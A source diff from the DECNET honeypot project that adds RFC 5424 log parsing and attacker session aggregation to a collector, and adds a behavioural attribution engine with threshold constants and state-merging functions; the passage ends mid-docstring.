                if value is not None:
                    entry[key] = value
            commands.append(entry)

        # Resolve the asciinema shard so consumers (notably the BEHAVE-SHELL
        # session-ended handler in the profiler worker) don't each have to
        # disk-reach independently. Shard fields can be malformed or the
        # transcripts dir may not exist yet — find_shard_with_sid returns
        # None in those cases and we publish ``shard_path: None`` so the
        # consumer skips honestly. Additive field; existing TTP consumers
        # ignore it.
        shard_path: str | None = None
        resolve_error: str | None = None
        if sid and decky and service:
            try:
                resolved = find_shard_with_sid(decky, service, sid)
            except (ValueError, OSError) as exc:
                # OSError already covers PermissionError.
                resolve_error = f"{type(exc).__name__}: {exc}"
                resolved = None
            if resolved is not None:
                shard_path = str(resolved)
        if shard_path is None and sid:
            # Loud-by-default — the BEHAVE-SHELL handler will skip
            # session.ended events with shard_path=None, so a silent
            # miss here means the profiler panel never hydrates. Surface
            # the most common failure modes inline so the operator can
            # diagnose without grepping decnet/artifacts/shards.py.
            #
            #   1. ARTIFACTS_ROOT not readable by the collector's user
            #      (perm 0750 decnet:decnet vs. User=anti without
            #      SupplementaryGroups=decnet).
            #   2. service whitelist (_SERVICE_RE accepts ssh|telnet only).
            #   3. sessrec hasn't flushed the shard for this sid yet
            #      (collector tick won the race; next tick recovers).
            logger.warning(
                "collector: shard_path=None decky=%s service=%s sid=%s "
                "(error=%s) — profiler will skip this session.ended; "
                "check ARTIFACTS_ROOT perms / service whitelist",
                decky, service, sid, resolve_error or "shard not found",
            )

        payload: dict[str, Any] = {
            "session_id": sid or None,
            "attacker_uuid": None,  # consumer resolves via repo
            "attacker_ip": attacker_ip,
            "decky_id": decky,
            "service": service,
            "ended_at": ended_at.isoformat(),
            "duration_s": duration_s,
            "commands": commands,
            "shard_path": shard_path,
        }
        topic = _topics.attacker(_topics.ATTACKER_SESSION_ENDED)
        try:
            self._publish(topic, payload, _topics.ATTACKER_SESSION_ENDED)
        except Exception as exc:  # noqa: BLE001
            logger.debug(
                "collector: session.ended publish failed: %s", exc,
            )
|
||||||
|
|
||||||
# ─── RFC 5424 parser ──────────────────────────────────────────────────────────
|
# ─── RFC 5424 parser ──────────────────────────────────────────────────────────
|
||||||
|
|
||||||
_RFC5424_RE = re.compile(
|
_RFC5424_RE = re.compile(
|
||||||
@@ -129,6 +374,27 @@ _RFC5424_RE = re.compile(
|
|||||||
r"(\S+) " # 4: MSGID (event_type)
|
r"(\S+) " # 4: MSGID (event_type)
|
||||||
r"(.+)$", # 5: SD element + optional MSG
|
r"(.+)$", # 5: SD element + optional MSG
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Honeypot SSH containers export a ``PROMPT_COMMAND`` that calls
|
||||||
|
# ``logger --rfc5424 --msgid command -p user.info -t bash "CMD …"``.
|
||||||
|
# That inner RFC 5424 line lands on the container's stdout, where the
|
||||||
|
# Docker stream reader prepends ANOTHER RFC 5424 envelope (PRI=14,
|
||||||
|
# HOSTNAME=<decky>, APP-NAME=1, MSGID=NIL). The outer parse therefore
|
||||||
|
# sees ``event_type == "-"`` while the real MSGID (``command``) is
|
||||||
|
# inside the body. We detect that case and re-extract the inner
|
||||||
|
# ``HOSTNAME APP-NAME PROCID MSGID rest`` so downstream consumers see
|
||||||
|
# ``event_type == "command"`` plus the real source hostname.
|
||||||
|
#
|
||||||
|
# Anchored on an ISO-8601 timestamp at the head of the body so we
|
||||||
|
# don't false-match free-form prose like "Connection from 1.2.3.4".
|
||||||
|
_INNER_RFC5424_RE = re.compile(
|
||||||
|
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
|
||||||
|
r"(\S+)\s+" # 2: inner HOSTNAME
|
||||||
|
r"(\S+)\s+" # 3: inner APP-NAME
|
||||||
|
r"\S+\s+" # PROCID (NIL or PID)
|
||||||
|
r"(\S+)\s+" # 4: inner MSGID
|
||||||
|
r"(.+)$", # 5: inner SD/MSG remainder
|
||||||
|
)
|
||||||
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
|
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
|
||||||
_PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')
|
_PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')
|
||||||
_IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip")
|
_IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip")
|
||||||
@@ -168,8 +434,23 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
|||||||
ts_raw, decky, service, event_type, sd_rest = m.groups()
|
ts_raw, decky, service, event_type, sd_rest = m.groups()
|
||||||
|
|
||||||
fields: dict[str, str] = {}
|
fields: dict[str, str] = {}
|
||||||
msg: str = ""
|
|
||||||
|
|
||||||
|
# Honeypot SSH PROMPT_COMMAND lines are double-wrapped (Docker
|
||||||
|
# stdout envelope around the inner ``logger --msgid command`` line).
|
||||||
|
# Outer MSGID is NIL; the real MSGID is inside the body. Detect
|
||||||
|
# the inner shape and re-extract HOSTNAME / APP-NAME / MSGID /
|
||||||
|
# remainder so downstream extraction sees the real header.
|
||||||
|
if event_type == "-" and sd_rest.startswith("-"):
|
||||||
|
body = sd_rest[1:].lstrip()
|
||||||
|
inner = _INNER_RFC5424_RE.match(body)
|
||||||
|
if inner is not None:
|
||||||
|
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
|
||||||
|
decky = i_host
|
||||||
|
service = i_app
|
||||||
|
event_type = i_msgid
|
||||||
|
sd_rest = i_rest
|
||||||
|
|
||||||
|
msg: str = ""
|
||||||
if sd_rest.startswith("-"):
|
if sd_rest.startswith("-"):
|
||||||
msg = sd_rest[1:].lstrip()
|
msg = sd_rest[1:].lstrip()
|
||||||
elif sd_rest.startswith("["):
|
elif sd_rest.startswith("["):
|
||||||
@@ -177,16 +458,28 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
|||||||
if block:
|
if block:
|
||||||
for k, v in _PARAM_RE.findall(block.group(1)):
|
for k, v in _PARAM_RE.findall(block.group(1)):
|
||||||
fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]")
|
fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]")
|
||||||
msg_match = re.search(r'\]\s+(.+)$', sd_rest)
|
# Always recover the post-SD message tail, even when the SD
|
||||||
if msg_match:
|
# block isn't ``relay@55555`` (e.g. the ``timeQuality`` block
|
||||||
msg = msg_match.group(1).strip()
|
# syslog auto-emits on bash CMD lines). Without this the body
|
||||||
|
# of unwrapped PROMPT_COMMAND lines stays empty and the
|
||||||
|
# attacker_ip kv-fallback below has nothing to scan.
|
||||||
|
msg_match = re.search(r'\]\s+(.+)$', sd_rest)
|
||||||
|
if msg_match:
|
||||||
|
msg = msg_match.group(1).strip()
|
||||||
else:
|
else:
|
||||||
msg = sd_rest
|
msg = sd_rest
|
||||||
|
|
||||||
attacker_ip = "Unknown"
|
attacker_ip = "Unknown"
|
||||||
for fname in _IP_FIELDS:
|
for fname in _IP_FIELDS:
|
||||||
if fname in fields:
|
if fname in fields:
|
||||||
attacker_ip = fields[fname]
|
raw = fields[fname]
|
||||||
|
# remote_addr may be "host:port" — split so identity keys on IP only.
|
||||||
|
host, _, port = raw.rpartition(":")
|
||||||
|
if host and port.isdigit():
|
||||||
|
attacker_ip = host.strip("[]") # handle [::1]:port IPv6 form
|
||||||
|
fields.setdefault("remote_port", port)
|
||||||
|
else:
|
||||||
|
attacker_ip = raw
|
||||||
break
|
break
|
||||||
|
|
||||||
# Fallback for plain `logger` callers that don't use SD params (notably
|
# Fallback for plain `logger` callers that don't use SD params (notably
|
||||||
@@ -220,6 +513,12 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
|||||||
except ValueError:
|
except ValueError:
|
||||||
ts_formatted = ts_raw
|
ts_formatted = ts_raw
|
||||||
|
|
||||||
|
# Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
|
||||||
|
# "CMD ") get event_type rewritten to "command". `fields` stays empty
|
||||||
|
# so the frontend's msg-based pill rendering doesn't double up.
|
||||||
|
if event_type == "-" and msg.startswith("CMD "):
|
||||||
|
event_type = "command"
|
||||||
|
|
||||||
return {
|
return {
|
||||||
"timestamp": ts_formatted,
|
"timestamp": ts_formatted,
|
||||||
"decky": decky,
|
"decky": decky,
|
||||||
@@ -346,7 +645,7 @@ def _stream_container(
|
|||||||
publish_fn: CollectorPublishFn | None = None,
|
publish_fn: CollectorPublishFn | None = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""Stream logs from one container and append to the host log files."""
|
"""Stream logs from one container and append to the host log files."""
|
||||||
import docker # type: ignore[import]
|
import docker
|
||||||
|
|
||||||
lf: Optional[Any] = None
|
lf: Optional[Any] = None
|
||||||
jf: Optional[Any] = None
|
jf: Optional[Any] = None
|
||||||
@@ -416,12 +715,17 @@ def _make_system_log_publisher(
|
|||||||
thread can call it unconditionally. Otherwise each call is marshalled
|
thread can call it unconditionally. Otherwise each call is marshalled
|
||||||
onto *loop* (the asyncio event loop that owns the bus socket) via
|
onto *loop* (the asyncio event loop that owns the bus socket) via
|
||||||
``make_thread_safe_publisher``.
|
``make_thread_safe_publisher``.
|
||||||
|
|
||||||
|
The same call also feeds a :class:`_SessionAggregator` so shell
|
||||||
|
commands are indexed per-attacker_ip and ``attacker.session.ended``
|
||||||
|
fires whenever the SSH ``sessrec`` worker logs ``session_recorded``.
|
||||||
"""
|
"""
|
||||||
raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None
|
raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None
|
||||||
if raw_publish is None:
|
if raw_publish is None:
|
||||||
return lambda _parsed: None
|
return lambda _parsed: None
|
||||||
|
|
||||||
topic = _topics.system(_topics.SYSTEM_LOG)
|
topic = _topics.system(_topics.SYSTEM_LOG)
|
||||||
|
aggregator = _SessionAggregator(raw_publish)
|
||||||
|
|
||||||
def _publish(parsed: dict[str, Any]) -> None:
|
def _publish(parsed: dict[str, Any]) -> None:
|
||||||
event_type = parsed.get("event_type", "")
|
event_type = parsed.get("event_type", "")
|
||||||
@@ -436,6 +740,7 @@ def _make_system_log_publisher(
|
|||||||
},
|
},
|
||||||
event_type,
|
event_type,
|
||||||
)
|
)
|
||||||
|
aggregator.add_event(parsed)
|
||||||
|
|
||||||
return _publish
|
return _publish
|
||||||
|
|
||||||
@@ -450,7 +755,7 @@ async def log_collector_worker(log_file: str) -> None:
|
|||||||
|
|
||||||
Watches Docker events to pick up containers started after initial scan.
|
Watches Docker events to pick up containers started after initial scan.
|
||||||
"""
|
"""
|
||||||
import docker # type: ignore[import]
|
import docker
|
||||||
|
|
||||||
log_path = Path(log_file)
|
log_path = Path(log_file)
|
||||||
json_path = log_path.with_suffix(".json")
|
json_path = log_path.with_suffix(".json")
|
||||||
|
|||||||
@@ -39,6 +39,7 @@ Shape::
|
|||||||
master-host = 10.0.0.1 # required on agents
|
master-host = 10.0.0.1 # required on agents
|
||||||
syslog-port = 6514
|
syslog-port = 6514
|
||||||
swarmctl-port = 8770
|
swarmctl-port = 8770
|
||||||
|
swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl`
|
||||||
|
|
||||||
[logging]
|
[logging]
|
||||||
system-log = /var/log/decnet/decnet.system.log
|
system-log = /var/log/decnet/decnet.system.log
|
||||||
@@ -120,6 +121,7 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
|
|||||||
"master-host": "DECNET_SWARM_MASTER_HOST",
|
"master-host": "DECNET_SWARM_MASTER_HOST",
|
||||||
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
|
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
|
||||||
"swarmctl-port": "DECNET_SWARMCTL_PORT",
|
"swarmctl-port": "DECNET_SWARMCTL_PORT",
|
||||||
|
"swarmctl-host": "DECNET_SWARMCTL_HOST",
|
||||||
},
|
},
|
||||||
"logging": {
|
"logging": {
|
||||||
"system-log": "DECNET_SYSTEM_LOGS",
|
"system-log": "DECNET_SYSTEM_LOGS",
|
||||||
|
|||||||
21
decnet/correlation/attribution/__init__.py
Normal file
21
decnet/correlation/attribution/__init__.py
Normal file
@@ -0,0 +1,21 @@
|
|||||||
|
"""DECNET attribution engine — v0 aggregation library.
|
||||||
|
|
||||||
|
Pure library: per-(identity, primitive) state machine over BEHAVE-SHELL
|
||||||
|
observations. No I/O, no bus, no DB. The bus subscriber and DB writes
|
||||||
|
live in :mod:`decnet.correlation.attribution_worker` so this package
|
||||||
|
stays trivially testable with synthetic observation lists.
|
||||||
|
|
||||||
|
See ``development/ATTRIBUTION-ENGINE.md`` for the full design and the
|
||||||
|
explicit bright line: this engine does NOT do persona classification
|
||||||
|
(HUMAN/LLM/SCRIPTED), does NOT gate access, does NOT attribute to
|
||||||
|
named persons. It surfaces *behavioural coherence* and *behavioural
|
||||||
|
drift*, and stops there.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from decnet.correlation.attribution.aggregate import (
|
||||||
|
AttributionState,
|
||||||
|
aggregate_observations,
|
||||||
|
)
|
||||||
|
|
||||||
|
__all__ = ["AttributionState", "aggregate_observations"]
|
||||||
62
decnet/correlation/attribution/_thresholds.py
Normal file
62
decnet/correlation/attribution/_thresholds.py
Normal file
@@ -0,0 +1,62 @@
|
|||||||
|
"""Calibration thresholds for the attribution engine — every magic
|
||||||
|
number lives here, named, with the calibration source cited.
|
||||||
|
|
||||||
|
v0 values are heuristic. Real calibration ships when red-team
|
||||||
|
exercises produce labelled trace data
|
||||||
|
(``ATTRIBUTION-ENGINE.md`` §"Out of scope"). Until then these constants
|
||||||
|
are the engine's only knobs; aggregate.py never embeds a literal.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
# ── Categorical merger ────────────────────────────────────────────────
|
||||||
|
# Last-N window size for the categorical state machine. 5 calibrates
|
||||||
|
# against typical session counts (most attackers are observed < 10
|
||||||
|
# times before they go quiet — ATTRIBUTION-ENGINE.md §"Open question
|
||||||
|
# 2"). Operators with long-running attackers will want a wider window
|
||||||
|
# in v1.
|
||||||
|
CATEGORICAL_WINDOW_N = 5
|
||||||
|
|
||||||
|
# Minimum observations before the merger emits anything other than
|
||||||
|
# ``unknown``. Below this floor the state machine has no signal.
|
||||||
|
MIN_OBSERVATIONS_FOR_STATE = 3
|
||||||
|
|
||||||
|
# Categorical merger is one-outlier-tolerant: in a window of N=5, the
|
||||||
|
# state is ``stable`` if at least ``MAJORITY_THRESHOLD`` agree.
|
||||||
|
CATEGORICAL_MAJORITY_THRESHOLD = 4
|
||||||
|
|
||||||
|
# ── Numeric merger ────────────────────────────────────────────────────
|
||||||
|
# EWMA smoothing factor for numeric primitives. 0.3 weights recent
|
||||||
|
# observations enough to surface drift quickly without flapping on
|
||||||
|
# single outliers.
|
||||||
|
NUMERIC_EWMA_ALPHA = 0.3
|
||||||
|
|
||||||
|
# Coefficient-of-variation thresholds: dispersion / |mean|.
|
||||||
|
NUMERIC_STABLE_DISPERSION_PCT = 0.20 # < 20% of mean → stable
|
||||||
|
NUMERIC_DRIFT_MEAN_SHIFT_PCT = 0.30 # mean moved > 30% → drifting
|
||||||
|
NUMERIC_CONFLICT_DISPERSION_PCT = 1.0 # > 100% of mean → conflicted
|
||||||
|
|
||||||
|
# ── Hash merger ───────────────────────────────────────────────────────
|
||||||
|
# Rotations within HASH_DRIFT_WINDOW_SECS count toward state transitions.
|
||||||
|
# 1..HASH_DRIFT_MAX rotations → drifting; more → conflicted. The values mirror the
|
||||||
|
# DEBT-032 fingerprint-rotation calibration — bumped by one because
|
||||||
|
# the attribution engine takes one rotation as evidence-of-life, not
|
||||||
|
# yet evidence-of-drift.
|
||||||
|
HASH_DRIFT_MAX = 2
|
||||||
|
HASH_DRIFT_WINDOW_SECS = 24 * 60 * 60 # 24h
|
||||||
|
|
||||||
|
# ── Multi-actor cap ───────────────────────────────────────────────────
|
||||||
|
# multi_actor confidence is capped to keep the dashboard honest about
|
||||||
|
# how noisy this signal is. ATTRIBUTION-ENGINE.md §"Open question 1":
|
||||||
|
# flapping primitives on flaky networks look like two operators.
|
||||||
|
MULTI_ACTOR_MAX_CONFIDENCE = 0.6
|
||||||
|
|
||||||
|
# ── Cross-primitive correlator (Phase 5) ──────────────────────────────
|
||||||
|
# Minimum number of primitives that must independently flag
|
||||||
|
# ``multi_actor`` for the same identity before
|
||||||
|
# ``attribution.profile.multi_actor_suspected`` fires.
|
||||||
|
MULTI_ACTOR_MIN_PRIMITIVES = 2
|
||||||
|
|
||||||
|
# Tick interval for the periodic walk in
|
||||||
|
# :mod:`decnet.correlation.attribution_worker`. Configurable via env
|
||||||
|
# var in v1; hardcoded in v0.
|
||||||
|
MULTI_ACTOR_TICK_SECS = 60.0
|
||||||
418
decnet/correlation/attribution/aggregate.py
Normal file
418
decnet/correlation/attribution/aggregate.py
Normal file
@@ -0,0 +1,418 @@
|
|||||||
|
"""Per-(identity, primitive) state-machine — the attribution engine's
|
||||||
|
core merge logic.
|
||||||
|
|
||||||
|
Pure: given a list of BEHAVE observations for one
|
||||||
|
``(identity_uuid, primitive)`` pair (already ordered by ``ts`` ASC),
|
||||||
|
returns the derived state. No DB, no bus, no I/O. The worker
|
||||||
|
(``decnet.correlation.attribution_worker``) is responsible for loading
|
||||||
|
the observations and writing the state row.
|
||||||
|
|
||||||
|
State vocabulary is frozen at five values (see
|
||||||
|
``ATTRIBUTION-ENGINE.md``):
|
||||||
|
|
||||||
|
* ``unknown`` — < ``MIN_OBSERVATIONS_FOR_STATE`` observations
|
||||||
|
* ``stable`` — recent N agree
|
||||||
|
* ``drifting`` — recent N stable but disagree with older N
|
||||||
|
* ``conflicted`` — recent N split
|
||||||
|
* ``multi_actor`` — conflicted + cross-session alternation pattern
|
||||||
|
|
||||||
|
Phase 2 ships :func:`aggregate_categorical` (the dominant ValueKind
|
||||||
|
for BEHAVE-SHELL primitives). Phase 3 adds numeric + hash mergers and
|
||||||
|
the ValueKind dispatcher in :func:`aggregate_observations`.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from collections import Counter
|
||||||
|
from dataclasses import dataclass
|
||||||
|
from typing import Any, Sequence
|
||||||
|
|
||||||
|
from decnet.correlation.attribution import _thresholds as _T
|
||||||
|
|
||||||
|
__all__ = [
|
||||||
|
"AttributionState",
|
||||||
|
"aggregate_observations",
|
||||||
|
"aggregate_categorical",
|
||||||
|
"aggregate_numeric",
|
||||||
|
"aggregate_hash",
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
@dataclass(frozen=True)
class AttributionState:
    """Output of the merger for one ``(identity, primitive)`` pair.

    Immutable value object. The fields map onto
    :class:`AttributionStateRow` columns; the worker composes the final
    dict for ``upsert_attribution_state`` by adding ``identity_uuid`` +
    ``primitive`` (the merger does not own the natural key) and a
    ``last_change_ts`` derived from the prior row.
    """

    # Representative value chosen by the merger: the recent EWMA for the
    # numeric merger, the most recent hash for the hash merger. May be None.
    current_value: Any
    # One of the frozen state vocabulary strings: "unknown", "stable",
    # "drifting", "conflicted", "multi_actor".
    state: str
    # Merger-specific confidence score; the mergers in this module emit
    # values between 0.0 and 1.0.
    confidence: float
    # Number of observations the merger was given.
    observation_count: int
    # ``ts`` of the last observation in the input (0.0 when it has none).
    last_observation_ts: float
|
||||||
|
|
||||||
|
|
||||||
|
def aggregate_observations(
    observations: Sequence[dict[str, Any]],
    *,
    value_kind: str | None = None,
) -> AttributionState:
    """Dispatch *observations* to the merger matching *value_kind*.

    Args:
        observations: Observation dicts for one ``(identity, primitive)``
            pair carrying at minimum ``value``, ``ts`` and ``confidence``.
            Sessions are not collapsed beforehand; the mergers reason over
            the full per-observation series.
        value_kind: Hint from the BEHAVE primitive registry —
            ``"categorical"``, ``"numeric"`` or ``"hash"``. ``None`` is
            treated as categorical.

    Returns:
        The derived :class:`AttributionState`. Empty input short-circuits
        to the ``unknown`` state before *value_kind* is even inspected.

    Raises:
        ValueError: If *observations* is non-empty and *value_kind* is not
            one of the recognised kinds.
    """
    if not observations:
        return _unknown(0.0, count=0)

    # Reject unrecognised kinds up front, then pick the merger.
    if value_kind not in (None, "categorical", "numeric", "hash"):
        raise ValueError(
            f"aggregate_observations: unknown value_kind={value_kind!r}; "
            "expected 'categorical' | 'numeric' | 'hash' | None",
        )
    if value_kind == "numeric":
        return aggregate_numeric(observations)
    if value_kind == "hash":
        return aggregate_hash(observations)
    return aggregate_categorical(observations)
|
||||||
|
|
||||||
|
|
||||||
|
def aggregate_numeric(
    observations: Sequence[dict[str, Any]],
) -> AttributionState:
    """Numeric merger — for primitives whose ``value`` is an int or float
    (e.g. ``toolchain.c2.beacon_interval_ms``, ``motor.paste_burst_rate``).

    The EWMA of the most recent window is compared with the EWMA of the
    window before it, and dispersion of the recent window is measured as
    a coefficient of variation (CV) around that EWMA. Checks run in this
    order:

    1. fewer than ``MIN_OBSERVATIONS_FOR_STATE`` observations →
       ``unknown`` (confidence 0.0, value = last raw observation)
    2. recent CV > ``NUMERIC_CONFLICT_DISPERSION_PCT`` → ``conflicted``
       (confidence fixed at 0.5)
    3. an older window exists and the relative mean shift is
       >= ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``drifting``
    4. anything else → ``stable``

    For ``stable`` and ``drifting`` the confidence is
    ``1 - min(CV, 1.0)`` floored at 0 — tighter dispersion means higher
    confidence. ``current_value`` is the recent EWMA rather than the last
    raw reading. ``multi_actor`` is never produced here.
    """
    count = len(observations)
    latest_ts = float(observations[-1].get("ts", 0.0)) if count else 0.0

    def _result(state: str, value: Any, confidence: float) -> AttributionState:
        # Every outcome shares the same count / timestamp bookkeeping.
        return AttributionState(
            current_value=value,
            state=state,
            confidence=confidence,
            observation_count=count,
            last_observation_ts=latest_ts,
        )

    if count < _T.MIN_OBSERVATIONS_FOR_STATE:
        newest = _safe_float(observations[-1].get("value")) if count else None
        return _result("unknown", newest, 0.0)

    # The numeric merger reuses the categorical window size.
    span = _T.CATEGORICAL_WINDOW_N
    recent = [_safe_float(obs.get("value")) for obs in observations[-span:]]
    previous = [
        _safe_float(obs.get("value"))
        for obs in observations[-2 * span: -span]
    ]
    recent_mean = _ewma(recent, _T.NUMERIC_EWMA_ALPHA)
    spread = _coef_of_variation(recent, recent_mean)

    if spread > _T.NUMERIC_CONFLICT_DISPERSION_PCT:
        return _result("conflicted", recent_mean, 0.5)

    tightness = max(0.0, 1.0 - min(spread, 1.0))

    drifted = False
    if previous:
        baseline = _ewma(previous, _T.NUMERIC_EWMA_ALPHA)
        # A zero baseline would divide by zero; fall back to an absolute shift.
        scale = abs(baseline) if baseline != 0 else 1.0
        shift = abs(recent_mean - baseline) / scale
        drifted = shift >= _T.NUMERIC_DRIFT_MEAN_SHIFT_PCT

    return _result("drifting" if drifted else "stable", recent_mean, tightness)
|
||||||
|
|
||||||
|
|
||||||
|
def aggregate_hash(
    observations: Sequence[dict[str, Any]],
) -> AttributionState:
    """Hash merger — for rotation-resistant fingerprints
    (``toolchain.tls.jarm_server``, ``toolchain.ssh.hassh_client``).

    No hashes are recomputed here. The merger looks at the observations
    whose ``ts`` lies within ``HASH_DRIFT_WINDOW_SECS`` of the most recent
    one, counts the distinct non-``None`` values among them, and treats
    ``distinct - 1`` (floored at 0) as the number of rotations:

    * 0 rotations → ``stable``
    * 1 to ``HASH_DRIFT_MAX`` rotations → ``drifting``
    * more than ``HASH_DRIFT_MAX`` rotations → ``conflicted``

    ``unknown`` is returned only for empty input. ``current_value`` is the
    most recent hash, and confidence is ``1 / (1 + rotations)`` — 1.0 with
    no rotation, 1/2 after one, 1/3 after two, and so on.
    """
    total = len(observations)
    if total == 0:
        return _unknown(0.0, count=0)

    newest = observations[-1]
    newest_ts = float(newest.get("ts", 0.0))
    newest_value = newest.get("value")

    earliest_ts = newest_ts - _T.HASH_DRIFT_WINDOW_SECS
    windowed_values = [
        obs.get("value")
        for obs in observations
        if float(obs.get("ts", 0.0)) >= earliest_ts
    ]
    seen = {value for value in windowed_values if value is not None}
    rotations = max(0, len(seen) - 1)

    if rotations == 0:
        label = "stable"
    else:
        label = "drifting" if rotations <= _T.HASH_DRIFT_MAX else "conflicted"

    return AttributionState(
        current_value=newest_value,
        state=label,
        confidence=1.0 / (1.0 + rotations),
        observation_count=total,
        last_observation_ts=newest_ts,
    )
|
||||||
|
|
||||||
|
|
||||||
|
def _ewma(values: Sequence[float], alpha: float) -> float:
    """Return the exponentially weighted moving average of *values*.

    The first sample seeds the average; every later sample is blended in
    with weight *alpha* against ``1 - alpha`` for the running value.

    Empty input is not supported: pulling the seed from an exhausted
    iterator raises ``StopIteration``. Callers are expected to have
    gated on ``MIN_OBSERVATIONS_FOR_STATE`` before calling.
    """
    stream = iter(values)
    running = next(stream)  # seed; raises StopIteration on empty input
    keep = 1.0 - alpha
    for sample in stream:
        running = alpha * sample + keep * running
    return running
|
||||||
|
|
||||||
|
|
||||||
|
def _coef_of_variation(values: Sequence[float], mean: float) -> float:
    """Return the population coefficient of variation, ``stdev / |mean|``.

    *mean* is supplied by the caller and is used as the centre for the
    variance computation. Special cases:

    * empty *values* -> ``0.0``
    * constant signal -> ``0.0`` (zero spread)
    * ``mean == 0`` with non-zero spread -> ``1e9``, a finite stand-in
      for infinity so threshold comparisons upstream still work without
      a dedicated branch.
    """
    if not values:
        return 0.0
    count = len(values)
    spread = (sum((sample - mean) ** 2 for sample in values) / count) ** 0.5
    if mean != 0:
        return spread / abs(mean)
    # Zero mean: the ratio is undefined, so report "flat" or "huge".
    return 1e9 if spread != 0 else 0.0
|
||||||
|
|
||||||
|
|
||||||
|
def _safe_float(value: Any) -> float:
    """Coerce an observation value to ``float`` without raising on ``None``.

    ``None`` maps to ``0.0`` and booleans map to ``1.0`` / ``0.0``;
    anything else goes through ``float()`` and may raise whatever
    ``float()`` raises for that input.
    """
    # ``bool`` cannot be subclassed, so identity checks against the two
    # singletons cover exactly the values ``isinstance(value, bool)`` would.
    if value is None or value is False:
        return 0.0
    if value is True:
        return 1.0
    return float(value)
|
||||||
|
|
||||||
|
|
||||||
|
def aggregate_categorical(
    observations: Sequence[dict[str, Any]],
) -> AttributionState:
    """Merge a categorical observation series into an ``AttributionState``.

    The most recent ``CATEGORICAL_WINDOW_N`` observations (the "recent"
    window) are compared against the window immediately before them
    (the "older" window). A window has a *clear majority* when its most
    common value appears at least
    ``min(CATEGORICAL_MAJORITY_THRESHOLD, window_size)`` times.

    Outcomes:

    * empty input -> ``unknown`` with no value, count 0 and timestamp 0.0
    * fewer than ``MIN_OBSERVATIONS_FOR_STATE`` observations -> ``unknown``
    * recent window split, alternation detected -> ``multi_actor``
    * recent window split, no alternation -> ``conflicted``
    * recent window clear, no older window yet -> ``stable``
    * recent window clear, older window split or with a different
      majority -> ``drifting``
    * recent window clear and matching the older majority -> ``stable``

    ``confidence`` is the recent-window agreement ratio (0.0 for
    ``unknown``); for ``multi_actor`` it is capped at
    ``MULTI_ACTOR_MAX_CONFIDENCE``.

    ``current_value`` is the newest observation's value for ``unknown``,
    ``multi_actor`` and ``conflicted``, and the recent-window majority
    value for ``stable`` and ``drifting``.

    Args:
        observations: Observation dicts; ``"ts"`` and ``"value"`` are
            read from each. The last element is treated as the newest,
            so the series is presumably ordered oldest first.

    Returns:
        The merged ``AttributionState``.
    """
    n = len(observations)
    if n == 0:
        # There is no newest observation to index; answer the same way
        # the hash merger does instead of raising IndexError.
        return _unknown(0.0, count=0)

    newest = observations[-1]
    last_ts = float(newest.get("ts", 0.0))
    last_value = newest.get("value")

    def _result(state: str, value: Any, confidence: float) -> AttributionState:
        # Every outcome shares the observation count and newest timestamp.
        return AttributionState(
            current_value=value,
            state=state,
            confidence=confidence,
            observation_count=n,
            last_observation_ts=last_ts,
        )

    if n < _T.MIN_OBSERVATIONS_FOR_STATE:
        return _result("unknown", last_value, 0.0)

    window = _T.CATEGORICAL_WINDOW_N
    recent_values = [o.get("value") for o in observations[-window:]]
    top_value, top_count = Counter(recent_values).most_common(1)[0]
    recent_size = len(recent_values)
    confidence = top_count / recent_size

    # The threshold is clamped to the window size so a short window can
    # still reach a clear majority.
    recent_clear = top_count >= min(
        _T.CATEGORICAL_MAJORITY_THRESHOLD, recent_size,
    )
    if not recent_clear:
        # Split recent window: separate an alternation pattern
        # (multi_actor) from unstructured disagreement (conflicted).
        if _is_alternation(observations):
            return _result(
                "multi_actor",
                last_value,
                min(confidence, _T.MULTI_ACTOR_MAX_CONFIDENCE),
            )
        return _result("conflicted", last_value, confidence)

    # Recent window has a clear majority; the window before it decides
    # between stable and drifting.
    older_values = [
        o.get("value") for o in observations[-2 * window: -window]
    ]
    if not older_values:
        # At most one window of data exists, so there is nothing to
        # drift away from.
        return _result("stable", top_value, confidence)

    older_top_value, older_top_count = Counter(older_values).most_common(1)[0]
    older_clear = older_top_count >= min(
        _T.CATEGORICAL_MAJORITY_THRESHOLD, len(older_values),
    )
    # A split older window that has since converged counts as drift, as
    # does a clear older majority on a different value.
    if not older_clear or older_top_value != top_value:
        return _result("drifting", top_value, confidence)
    return _result("stable", top_value, confidence)
|
||||||
|
|
||||||
|
|
||||||
|
def _is_alternation(observations: Sequence[dict[str, Any]]) -> bool:
    """Report whether the recent window looks like an A/B alternation.

    Looks only at the last ``CATEGORICAL_WINDOW_N`` observations and is
    deliberately conservative. It returns ``True`` only when all of the
    following hold:

    * the window holds at least 4 observations,
    * exactly 2 distinct values appear in it,
    * the number of adjacent value changes ("flips") is at least twice
